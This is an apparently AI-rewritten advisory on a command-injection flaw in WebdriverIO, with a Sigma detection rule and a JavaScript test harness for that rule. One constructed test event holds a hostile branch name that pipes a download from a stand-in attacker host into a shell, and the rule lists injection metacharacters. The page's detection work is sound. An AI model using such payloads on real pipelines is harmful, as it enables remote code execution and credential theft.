CVE-2026-25244: WebdriverIO RCE via Malicious Git Branch Names
The National Vulnerability Database has published details on CVE-2026-25244, a critical command injection vulnerability in WebdriverIO versions below 9.24.0. This flaw enables remote code execution (RCE) during test orchestration.
The vulnerability is in WebdriverIO's getGitMetadataForAISelection() function, which interpolates a Git branch name into a command string handed to execSync() without sanitizing or quoting it. execSync() runs that string through the system shell, so shell metacharacters in the branch name (backticks, `$(...)`) are evaluated as command substitutions rather than treated as part of a ref name. An attacker who can get the test orchestration to run against a repository they control, with a branch whose name carries the payload, gets code execution on whatever CI/CD server or developer machine performs the run.
The implications are severe: disclosure of credentials and secrets held by the CI runner, exfiltration of source code and SSH keys, full compromise of the host, and downstream supply chain attacks via tampered build artifacts. The National Vulnerability Database confirms the issue is fixed in WebdriverIO version 9.24.0 and urges immediate updates for all affected deployments.
What This Means For You
- If your organization uses WebdriverIO, especially in CI/CD pipelines or on developer machines that check out repositories from outside the organization, you are exposed to critical RCE via CVE-2026-25244. Upgrade to version 9.24.0 or newer immediately. Until then, treat branch names from untrusted repositories as hostile input: audit CI/CD logs for checkouts of unexpected repositories or of branches whose names contain shell metacharacters (backticks, `$(`, `;`, `&`, `|`), and review process telemetry from test runners for shells spawned by the Node.js process that run anything beyond the expected git commands.
Related ATT&CK Techniques
- T1059.004: Command and Scripting Interpreter: Unix Shell (Execution)
🛡️ Detection Rules
One of the three auto-generated Sigma rules for this advisory is shown below, mapped to MITRE ATT&CK; the Sigma YAML can be converted to other SIEM formats.
CVE-2026-25244: WebdriverIO Malicious Git Branch Name Command Injection
```yaml
title: CVE-2026-25244: WebdriverIO Malicious Git Branch Name Command Injection
id: scw-2026-05-18-ai-1
status: experimental
level: critical
description: |
  Detects a shell (sh, bash or cmd.exe) spawned by a Node.js process whose command line runs git
  with a ref name carrying command-substitution metacharacters (backticks or $( )). WebdriverIO
  versions below 9.24.0 build such a command string in getGitMetadataForAISelection() and pass it
  to execSync(), which hands it to the system shell, so a branch name containing these characters
  on that command line is a direct indicator of CVE-2026-25244 exploitation.
  The branch listing itself (git branch --format=%(refname:short)) carries no payload; the
  injection surfaces in the later command that reuses the listed name.
author: SCW Feed Engine (AI-generated)
date: 2026-05-18
references:
  - https://shimiscyberworld.com/posts/nvd-CVE-2026-25244/
tags:
  - attack.execution
  - attack.t1059.003
  - attack.t1059.004
logsource:
  category: process_creation
detection:
  # Image is a full path, so match on its suffix rather than on a bare file name.
  selection_shell:
    Image|endswith:
      - '/sh'
      - '/bash'
      - '\cmd.exe'
  selection_parent:
    ParentImage|endswith:
      - '/node'
      - '\node.exe'
  selection_git:
    CommandLine|contains: 'git '
  # '$(' rather than '$()' so that a substitution with content, e.g. $(id), still matches.
  selection_subst:
    CommandLine|contains:
      - '`'
      - '$('
  condition: all of selection_*
falsepositives:
  - 'Build or test scripts that legitimately run git inside a shell wrapper spawned by node and use command substitution'
  - 'On Windows, cmd.exe does not evaluate backticks or $( ); payloads there would use & or | and are not covered by this rule'
```
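To check what the rule above actually catches, here is an added example (not part of the page's Sigma rule or of WebdriverIO): the rule's selections re-implemented as a matcher and run over constructed process_creation events. Field names follow the Sigma process_creation taxonomy; the events, paths and command lines are made up for the demonstration.

```javascript
// Added example, not the page's rule and not WebdriverIO code: the Sigma
// selections as a matcher, run over constructed process_creation events so
// the logic can be checked before it is shipped to a SIEM.

// Constructed events. Only e1 should fire.
const EVENTS = [
  { id: 'e1', Image: '/bin/sh', ParentImage: '/usr/bin/node',
    CommandLine: 'sh -c git log -1 --format=%H fix/$(curl attacker.example/x|sh)' }, // payload branch
  { id: 'e2', Image: '/bin/sh', ParentImage: '/usr/bin/node',
    CommandLine: 'sh -c git log -1 --format=%H feature/login-fix' },                 // benign branch
  { id: 'e3', Image: '/usr/bin/git', ParentImage: '/bin/sh',
    CommandLine: 'git branch --format=%(refname:short)' },                           // the listing itself
  { id: 'e4', Image: '/bin/bash', ParentImage: '/usr/bin/bash',
    CommandLine: 'bash -c echo $(date)' },                                            // substitution, but not from node
  { id: 'e5', Image: 'C:\\Windows\\System32\\cmd.exe', ParentImage: 'C:\\Program Files\\nodejs\\node.exe',
    CommandLine: 'cmd.exe /d /s /c "git log -1 --format=%H main"' },                  // benign Windows run
];

// Selection terms, mirroring the rule. Sigma string matching is
// case-insensitive by default, so everything is lower-cased here too.
const SHELL_IMAGES = ['/sh', '/bash', '\\cmd.exe'];
const NODE_IMAGES = ['/node', '\\node.exe'];
const SUBST_TOKENS = ['$(', '`'];

function endsWithAny(value, suffixes) {
  const v = value.toLowerCase();
  return suffixes.some((s) => v.endsWith(s.toLowerCase()));
}

// condition: all of selection_* (shell AND parent AND git AND substitution)
function matchesRule(ev) {
  const cmd = ev.CommandLine.toLowerCase();
  const shellSpawned = endsWithAny(ev.Image, SHELL_IMAGES);
  const fromNode = endsWithAny(ev.ParentImage, NODE_IMAGES);
  const runsGit = cmd.includes('git ');
  const hasSubst = SUBST_TOKENS.some((t) => cmd.includes(t));
  return shellSpawned && fromNode && runsGit && hasSubst;
}

function findHits(events) {
  return events.filter(matchesRule).map((ev) => ev.id);
}

console.log('hits:', findHits(EVENTS));
```

e3 is the reason the rule keys on the shell rather than on `git.exe`: the branch listing that feeds the vulnerable function is itself harmless, and by the time git runs the payload has already been substituted away. e5 is a coverage gap worth knowing about: a cmd.exe payload would use `&` or `|`, which this rule deliberately does not match because those characters are too noisy in build pipelines.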
Indicators of Compromise and Affected Components
| ID | Type | Detail |
|---|---|---|
| CVE-2026-25244 | RCE | WebdriverIO versions < 9.24.0 |
| CVE-2026-25244 | Command Injection | WebdriverIO function getGitMetadataForAISelection() using execSync() with unsanitized Git branch names |
| CVE-2026-25244 | RCE | Exploitation via malicious Git repository branch name in testOrchestrationOptions.runSmartSelection.source |
Source & Attribution
| Field | Value |
|---|---|
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | May 19, 2026 at 00:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.